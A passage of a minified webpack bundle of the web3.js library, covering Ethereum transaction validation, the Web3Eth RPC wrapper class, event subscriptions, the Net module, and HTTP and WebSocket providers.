                }), t.validateTransactionForSigning = t.validateGas = t.validateFeeMarketGas = t.validateLegacyGas = t.validateHardfork = t.validateBaseChain = t.validateChainInfo = t.validateCustomChainInfo = t.validateTransactionCall = t.isTransactionCall = t.validateTransactionWithSender = t.isTransactionWithSender = t.isTransactionLegacyUnsigned = t.isTransaction2930Unsigned = t.isTransaction1559Unsigned = t.isAccessList = t.isAccessListEntry = t.isBaseTransaction = void 0;
                const n = r(9970), i = r(7345), o = r(5071), s = r(5140);
                function a(e) {
                    return !(!(0, i.isNullish)(e.to) && !(0, i.isAddress)(e.to) || !(0, i.isHexStrict)(e.type) && !(0, i.isNullish)(e.type) && 2 !== e.type.length || !(0, i.isHexStrict)(e.nonce) || !(0, i.isHexStrict)(e.gas) || !(0, i.isHexStrict)(e.value) || !(0, i.isHexStrict)(e.input) || e.chainId && !(0, i.isHexStrict)(e.chainId));
                }
                function u(e) {
                    return !(!(0, i.isNullish)(e.address) && !(0, i.isAddress)(e.address) || !(0, i.isNullish)(e.storageKeys) && !e.storageKeys.every((e)=>(0, i.isHexString32Bytes)(e)));
                }
                function c(e) {
                    return !(!Array.isArray(e) || !e.every((e)=>u(e)));
                }
                function l(e) {
                    return !!(a(e) && (0, i.isHexStrict)(e.maxFeePerGas) && (0, i.isHexStrict)(e.maxPriorityFeePerGas) && c(e.accessList));
                }
                function d(e) {
                    return !!a(e) && !!(0, i.isHexStrict)(e.gasPrice) && !!c(e.accessList);
                }
                function h(e) {
                    return !!a(e) && !!(0, i.isHexStrict)(e.gasPrice);
                }
                function f(e) {
                    return !!(0, i.isAddress)(e.from) && !!a(e) && !!(l(e) || d(e) || h(e));
                }
                function p(e) {
                    return !(!(0, i.isNullish)(e.from) && !(0, i.isAddress)(e.from) || !(0, i.isAddress)(e.to) || !(0, i.isNullish)(e.gas) && !(0, i.isHexStrict)(e.gas) || !(0, i.isNullish)(e.gasPrice) && !(0, i.isHexStrict)(e.gasPrice) || !(0, i.isNullish)(e.value) && !(0, i.isHexStrict)(e.value) || !(0, i.isNullish)(e.data) && !(0, i.isHexStrict)(e.data) || !(0, i.isNullish)(e.input) && !(0, i.isHexStrict)(e.input) || !(0, i.isNullish)(e.type) || l(e) || d(e));
                }
                t.isBaseTransaction = a, t.isAccessListEntry = u, t.isAccessList = c, t.isTransaction1559Unsigned = l, t.isTransaction2930Unsigned = d, t.isTransactionLegacyUnsigned = h, t.isTransactionWithSender = f, t.validateTransactionWithSender = function(e) {
                    if (!f(e)) throw new o.InvalidTransactionWithSender(e);
                }, t.isTransactionCall = p, t.validateTransactionCall = function(e) {
                    if (!p(e)) throw new o.InvalidTransactionCall(e);
                }, t.validateCustomChainInfo = (e)=>{
                    if (!(0, i.isNullish)(e.common)) {
                        if ((0, i.isNullish)(e.common.customChain)) throw new o.MissingCustomChainError;
                        if ((0, i.isNullish)(e.common.customChain.chainId)) throw new o.MissingCustomChainIdError;
                        if (!(0, i.isNullish)(e.chainId) && e.chainId !== e.common.customChain.chainId) throw new o.ChainIdMismatchError({
                            txChainId: e.chainId,
                            customChainId: e.common.customChain.chainId
                        });
                    }
                }, t.validateChainInfo = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.chain) && !(0, i.isNullish)(e.hardfork)) throw new o.CommonOrChainAndHardforkError;
                    if (!(0, i.isNullish)(e.chain) && (0, i.isNullish)(e.hardfork) || !(0, i.isNullish)(e.hardfork) && (0, i.isNullish)(e.chain)) throw new o.MissingChainOrHardforkError({
                        chain: e.chain,
                        hardfork: e.hardfork
                    });
                }, t.validateBaseChain = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.common.baseChain) && !(0, i.isNullish)(e.chain) && e.chain !== e.common.baseChain) throw new o.ChainMismatchError({
                        txChain: e.chain,
                        baseChain: e.common.baseChain
                    });
                }, t.validateHardfork = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.common.hardfork) && !(0, i.isNullish)(e.hardfork) && e.hardfork !== e.common.hardfork) throw new o.HardforkMismatchError({
                        txHardfork: e.hardfork,
                        commonHardfork: e.common.hardfork
                    });
                }, t.validateLegacyGas = (e)=>{
                    if ((0, i.isNullish)(e.gas) || !(0, i.isUInt)(e.gas) || (0, i.isNullish)(e.gasPrice) || !(0, i.isUInt)(e.gasPrice)) throw new o.InvalidGasOrGasPrice({
                        gas: e.gas,
                        gasPrice: e.gasPrice
                    });
                    if (!(0, i.isNullish)(e.maxFeePerGas) || !(0, i.isNullish)(e.maxPriorityFeePerGas)) throw new o.UnsupportedFeeMarketError({
                        maxFeePerGas: e.maxFeePerGas,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas
                    });
                }, t.validateFeeMarketGas = (e)=>{
                    if (!(0, i.isNullish)(e.gasPrice) && "0x2" === e.type) throw new o.Eip1559GasPriceError(e.gasPrice);
                    if ("0x0" === e.type || "0x1" === e.type) throw new o.UnsupportedFeeMarketError({
                        maxFeePerGas: e.maxFeePerGas,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas
                    });
                    if ((0, i.isNullish)(e.maxFeePerGas) || !(0, i.isUInt)(e.maxFeePerGas) || (0, i.isNullish)(e.maxPriorityFeePerGas) || !(0, i.isUInt)(e.maxPriorityFeePerGas)) throw new o.InvalidMaxPriorityFeePerGasOrMaxFeePerGas({
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                }, t.validateGas = (e)=>{
                    const r = !(0, i.isNullish)(e.gas) || !(0, i.isNullish)(e.gasLimit), n = r && !(0, i.isNullish)(e.gasPrice), s = r && !(0, i.isNullish)(e.maxPriorityFeePerGas) && !(0, i.isNullish)(e.maxFeePerGas);
                    if (!n && !s) throw new o.MissingGasError({
                        gas: e.gas,
                        gasPrice: e.gasPrice,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                    if (n && s) throw new o.TransactionGasMismatchError({
                        gas: e.gas,
                        gasPrice: e.gasPrice,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                    (n ? t.validateLegacyGas : t.validateFeeMarketGas)(e), (!(0, i.isNullish)(e.type) && e.type > "0x1" ? t.validateFeeMarketGas : t.validateLegacyGas)(e);
                }, t.validateTransactionForSigning = (e, r)=>{
                    if (!(0, i.isNullish)(r)) return void r(e);
                    if ("object" != typeof e || (0, i.isNullish)(e)) throw new o.InvalidTransactionObjectError(e);
                    (0, t.validateCustomChainInfo)(e), (0, t.validateChainInfo)(e), (0, t.validateBaseChain)(e), (0, t.validateHardfork)(e);
                    const a = (0, s.formatTransaction)(e, n.ETH_DATA_FORMAT);
                    if ((0, t.validateGas)(a), (0, i.isNullish)(a.nonce) || (0, i.isNullish)(a.chainId) || a.nonce.startsWith("-") || a.chainId.startsWith("-")) throw new o.InvalidNonceOrChainIdError({
                        nonce: e.nonce,
                        chainId: e.chainId
                    });
                };
            },
            1435: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Eth = t.registeredSubscriptions = void 0;
                const a = r(9970), u = r(6527), c = r(5071), l = r(9634), d = r(1181), h = o(r(3222)), f = r(7460);
                t.registeredSubscriptions = {
                    logs: f.LogsSubscription,
                    newPendingTransactions: f.NewPendingTransactionsSubscription,
                    newHeads: f.NewHeadsSubscription,
                    syncing: f.SyncingSubscription,
                    pendingTransactions: f.NewPendingTransactionsSubscription,
                    newBlockHeaders: f.NewHeadsSubscription
                };
                class p extends u.Web3Context {
                    constructor(e){
                        "string" == typeof e || (0, u.isSupportedProvider)(e) ? super({
                            provider: e,
                            registeredSubscriptions: t.registeredSubscriptions
                        }) : e.registeredSubscriptions ? super(e) : super(Object.assign(Object.assign({}, e), {
                            registeredSubscriptions: t.registeredSubscriptions
                        }));
                    }
                    getProtocolVersion() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getProtocolVersion(this.requestManager);
                        });
                    }
                    isSyncing() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getSyncing(this.requestManager);
                        });
                    }
                    getCoinbase() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getCoinbase(this.requestManager);
                        });
                    }
                    isMining() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getMining(this.requestManager);
                        });
                    }
                    getHashrate(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return this.getHashRate(e);
                        });
                    }
                    getHashRate(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getHashRate(this, e);
                        });
                    }
                    getGasPrice(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getGasPrice(this, e);
                        });
                    }
                    getAccounts() {
                        var e;
                        return s(this, void 0, void 0, function*() {
                            return (null !== (e = yield d.ethRpcMethods.getAccounts(this.requestManager)) && void 0 !== e ? e : []).map((e)=>(0, l.toChecksumAddress)(e));
                        });
                    }
                    getBlockNumber(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockNumber(this, e);
                        });
                    }
                    getBalance(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBalance(this, e, t, r);
                        });
                    }
                    getStorageAt(e, t, r = this.defaultBlock, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getStorageAt(this, e, t, r, n);
                        });
                    }
                    getCode(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getCode(this, e, t, r);
                        });
                    }
                    getBlock(e = this.defaultBlock, t = !1, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlock(this, e, t, r);
                        });
                    }
                    getBlockTransactionCount(e = this.defaultBlock, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockTransactionCount(this, e, t);
                        });
                    }
                    getBlockUncleCount(e = this.defaultBlock, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getBlockUncleCount(this, e, t);
                        });
                    }
                    getUncle(e = this.defaultBlock, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getUncle(this, e, t, r);
                        });
                    }
                    getTransaction(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            const r = yield h.getTransaction(this, e, t);
                            if (!r) throw new c.TransactionNotFound;
                            return r;
                        });
                    }
                    getPendingTransactions(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getPendingTransactions(this, e);
                        });
                    }
                    getTransactionFromBlock(e = this.defaultBlock, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getTransactionFromBlock(this, e, t, r);
                        });
                    }
                    getTransactionReceipt(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            const r = yield h.getTransactionReceipt(this, e, t);
                            if (!r) throw new c.TransactionNotFound;
                            return r;
                        });
                    }
                    getTransactionCount(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getTransactionCount(this, e, t, r);
                        });
                    }
                    sendTransaction(e, t = a.DEFAULT_RETURN_FORMAT, r) {
                        return h.sendTransaction(this, e, t, r);
                    }
                    sendSignedTransaction(e, t = a.DEFAULT_RETURN_FORMAT, r) {
                        return h.sendSignedTransaction(this, e, t, r);
                    }
                    sign(e, t, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.sign(this, e, t, r);
                        });
                    }
                    signTransaction(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.signTransaction(this, e, t);
                        });
                    }
                    call(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.call(this, e, t, r);
                        });
                    }
                    estimateGas(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.estimateGas(this, e, t, r);
                        });
                    }
                    getPastLogs(e, t = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getLogs(this, e, t);
                        });
                    }
                    getWork() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getWork(this.requestManager);
                        });
                    }
                    submitWork(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.submitWork(this.requestManager, e, t, r);
                        });
                    }
                    requestAccounts() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.requestAccounts(this.requestManager);
                        });
                    }
                    getChainId(e = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getChainId(this, e);
                        });
                    }
                    getNodeInfo() {
                        return s(this, void 0, void 0, function*() {
                            return d.ethRpcMethods.getNodeInfo(this.requestManager);
                        });
                    }
                    getProof(e, t, r = this.defaultBlock, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getProof(this, e, t, r, n);
                        });
                    }
                    getFeeHistory(e, t = this.defaultBlock, r, n = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.getFeeHistory(this, e, t, r, n);
                        });
                    }
                    createAccessList(e, t = this.defaultBlock, r = a.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return h.createAccessList(this, e, t, r);
                        });
                    }
                    subscribe(e, t, r = a.DEFAULT_RETURN_FORMAT) {
                        var n;
                        return s(this, void 0, void 0, function*() {
                            const i = yield null === (n = this.subscriptionManager) || void 0 === n ? void 0 : n.subscribe(e, t, r);
                            return i instanceof f.LogsSubscription && "logs" === e && "object" == typeof t && !(0, l.isNullish)(t.fromBlock) && Number.isFinite(Number(t.fromBlock)) && setImmediate(()=>{
                                this.getPastLogs(t).then((e)=>{
                                    for (const t of e)i._processSubscriptionResult(t);
                                }).catch((e)=>{
                                    i._processSubscriptionError(e);
                                });
                            }), i;
                        });
                    }
                    static shouldClearSubscription({ sub: e }) {
                        return !(e instanceof f.SyncingSubscription);
                    }
                    clearSubscriptions(e = !1) {
                        var t;
                        return null === (t = this.subscriptionManager) || void 0 === t ? void 0 : t.unsubscribe(e ? p.shouldClearSubscription : void 0);
                    }
                }
                t.Web3Eth = p;
            },
            7460: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SyncingSubscription = t.NewHeadsSubscription = t.NewPendingTransactionsSubscription = t.LogsSubscription = void 0;
                const n = r(9634), i = r(6527), o = r(1922);
                class s extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "logs",
                            this.args
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)(o.logSchema, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.LogsSubscription = s;
                class a extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "newPendingTransactions"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)({
                            format: "string"
                        }, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.NewPendingTransactionsSubscription = a;
                class u extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "newHeads"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        this.emit("data", (0, n.format)(o.blockHeaderSchema, e, super.returnFormat));
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.NewHeadsSubscription = u;
                class c extends i.Web3Subscription {
                    _buildSubscriptionParams() {
                        return [
                            "syncing"
                        ];
                    }
                    _processSubscriptionResult(e) {
                        if ("boolean" == typeof e) this.emit("changed", e);
                        else {
                            const t = Object.fromEntries(Object.entries(e.status).map(([e, t])=>[
                                    e.charAt(0).toLowerCase() + e.substring(1),
                                    t
                                ]));
                            this.emit("changed", e.syncing), this.emit("data", (0, n.format)(o.syncSchema, t, super.returnFormat));
                        }
                    }
                    _processSubscriptionError(e) {
                        this.emit("error", e);
                    }
                }
                t.SyncingSubscription = c;
            },
            9820: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(2491);
                i(r(2491), t), i(r(7961), t), t.default = o.Net;
            },
            2491: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Net = void 0;
                const a = r(6527), u = r(9970), c = o(r(7961));
                class l extends a.Web3Context {
                    getId(e = u.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return c.getId(this, e);
                        });
                    }
                    getPeerCount(e = u.DEFAULT_RETURN_FORMAT) {
                        return s(this, void 0, void 0, function*() {
                            return c.getPeerCount(this, e);
                        });
                    }
                    isListening() {
                        return s(this, void 0, void 0, function*() {
                            return c.isListening(this);
                        });
                    }
                }
                t.Net = l;
            },
            7961: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isListening = t.getPeerCount = t.getId = void 0;
                const i = r(9634), o = r(1181);
                t.getId = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield o.netRpcMethods.getId(e.requestManager);
                        return (0, i.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.getPeerCount = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = yield o.netRpcMethods.getPeerCount(e.requestManager);
                        return (0, i.format)({
                            format: "uint"
                        }, r, t);
                    });
                }, t.isListening = (e)=>n(void 0, void 0, void 0, function*() {
                        return o.netRpcMethods.isListening(e.requestManager);
                    });
            },
            6343: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                }, i = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.HttpProvider = void 0;
                const o = i(r(6279)), s = r(9970), a = r(5071);
                class u extends s.Web3BaseProvider {
                    constructor(e, t){
                        if (super(), !u.validateClientUrl(e)) throw new a.InvalidClientError(e);
                        this.clientUrl = e, this.httpProviderOptions = t;
                    }
                    static validateClientUrl(e) {
                        return "string" == typeof e && /^http(s)?:\/\//i.test(e);
                    }
                    getStatus() {
                        throw new a.MethodNotImplementedError;
                    }
                    supportsSubscriptions() {
                        return !1;
                    }
                    request(e, t) {
                        var r;
                        return n(this, void 0, void 0, function*() {
                            const n = Object.assign(Object.assign({}, null === (r = this.httpProviderOptions) || void 0 === r ? void 0 : r.providerOptions), t), i = yield (0, o.default)(this.clientUrl, Object.assign(Object.assign({}, n), {
                                method: "POST",
                                headers: Object.assign(Object.assign({}, n.headers), {
                                    "Content-Type": "application/json"
                                }),
                                body: JSON.stringify(e)
                            }));
                            if (!i.ok) throw new a.ResponseError((yield i.json()));
                            return yield i.json();
                        });
                    }
                    on() {
                        throw new a.MethodNotImplementedError;
                    }
                    removeListener() {
                        throw new a.MethodNotImplementedError;
                    }
                    once() {
                        throw new a.MethodNotImplementedError;
                    }
                    removeAllListeners() {
                        throw new a.MethodNotImplementedError;
                    }
                    connect() {
                        throw new a.MethodNotImplementedError;
                    }
                    disconnect() {
                        throw new a.MethodNotImplementedError;
                    }
                    reset() {
                        throw new a.MethodNotImplementedError;
                    }
                    reconnect() {
                        throw new a.MethodNotImplementedError;
                    }
                }
                t.default = u, t.HttpProvider = u;
            },
            1161: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.WebSocketProvider = void 0;
                const i = n(r(7475)), o = r(9634), s = r(5071);
                class a extends o.SocketProvider {
                    constructor(e, t, r){
                        super(e, t, r);
                    }
                    _validateProviderPath(e) {
                        return "string" == typeof e && /^ws(s)?:\/\//i.test(e);
                    }
                    getStatus() {
                        if (this._socketConnection && !(0, o.isNullish)(this._socketConnection)) switch(this._socketConnection.readyState){
                            case this._socketConnection.CONNECTING:
                                return "connecting";
                            case this._socketConnection.OPEN:
                                return "connected";
                            default:
                                return "disconnected";
                        }
                        return "disconnected";
                    }
                    _openSocketConnection() {
                        this._socketConnection = new i.default(this._socketPath, void 0, this._socketOptions && 0 === Object.keys(this._socketOptions).length ? void 0 : this._socketOptions);
                    }
                    _closeSocketConnection(e, t) {
                        var r;
                        null === (r = this._socketConnection) || void 0 === r || r.close(e, t);
                    }
                    _sendToSocket(e) {
                        var t;
                        if ("disconnected" === this.getStatus()) throw new s.ConnectionNotOpenError;
                        null === (t = this._socketConnection) || void 0 === t || t.send(JSON.stringify(e));
                    }
                    _parseResponses(e) {
                        return this.chunkResponseParser.parseResponse(e.data);
                    }
                    _addSocketListeners() {
                        var e, t, r, n;
                        null === (e = this._socketConnection) || void 0 === e || e.addEventListener("open", this._onOpenHandler), null === (t = this._socketConnection) || void 0 === t || t.addEventListener("message", this._onMessageHandler), null === (r = this._socketConnection) || void 0 === r || r.addEventListener("close", (e)=>this._onCloseHandler(e)), null === (n = this._socketConnection) || void 0 === n || n.addEventListener("error", this._onErrorHandler);
                    }
                    _removeSocketListeners() {
                        var e, t, r;
                        null === (e = this._socketConnection) || void 0 === e || e.removeEventListener("message", this._onMessageHandler), null === (t = this._socketConnection) || void 0 === t || t.removeEventListener("open", this._onOpenHandler), null === (r = this._socketConnection) || void 0 === r || r.removeEventListener("close", this._onCloseHandler);
                    }
                    _onCloseEvent(e) {
                        var t;
                        !this._reconnectOptions.autoReconnect || [
                            1e3,
                            1001
                        ].includes(e.code) && e.wasClean ? (this._clearQueues(e), this._removeSocketListeners(), this._onDisconnect(e.code, e.reason), null === (t = this._socketConnection) || void 0 === t || t.removeEventListener("error", this._onErrorHandler)) : this._reconnect();
                    }
                }
                t.default = a, t.WebSocketProvider = a;
            },
            9298: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getNodeInfo = t.getProof = t.getChainId = t.requestAccounts = t.getPendingTransactions = t.getFeeHistory = t.submitHashrate = t.submitWork = t.getWork = t.getLogs = t.getFilterLogs = t.getFilterChanges = t.uninstallFilter = t.newPendingTransactionFilter = t.newBlockFilter = t.newFilter = t.compileSerpent = t.compileLLL = t.compileSolidity = t.getCompilers = t.getUncleByBlockNumberAndIndex = t.getUncleByBlockHashAndIndex = t.getTransactionReceipt = t.getTransactionByBlockNumberAndIndex = t.getTransactionByBlockHashAndIndex = t.getTransactionByHash = t.getBlockByNumber = t.getBlockByHash = t.estimateGas = t.call = t.sendRawTransaction = t.sendTransaction = t.signTransaction = t.sign = t.getCode = t.getUncleCountByBlockNumber = t.getUncleCountByBlockHash = t.getBlockTransactionCountByNumber = t.getBlockTransactionCountByHash = t.getTransactionCount = t.getStorageAt = t.getBalance = t.getBlockNumber = t.getAccounts = t.getGasPrice = t.getHashRate = t.getMining = t.getCoinbase = t.getSyncing = t.getProtocolVersion = void 0, t.createAccessList = void 0;
                const i = r(7345);
                t.getProtocolVersion = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_protocolVersion",
                            params: []
                        });
                    });
                }, t.getSyncing = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_syncing",
                            params: []
                        });
                    });
                }, t.getCoinbase = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_coinbase",
                            params: []
                        });
                    });
                }, t.getMining = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_mining",
                            params: []
                        });
                    });
                }, t.getHashRate = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_hashrate",
                            params: []
                        });
                    });
                }, t.getGasPrice = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_gasPrice",
                            params: []
                        });
                    });
                }, t.getAccounts = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_accounts",
                            params: []
                        });
                    });
                }, t.getBlockNumber = function(e) {
                    return n(this, void 0, void 0, function*() {
                        return e.send({
                            method: "eth_blockNumber",
                            params: []
                        });
                    });
                }, t.getBalance = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        return i.validator.validate([
                            "address",
                            "blockNumberOrTag"
                        ], [
                            t,
                            r
                        ]), e.send({
                            method: "eth_getBalance",
                            params: [
                                t,
                                r
                            ]
                        });
                    });
                }, t.getStorageAt = function(e, t, r, o) {
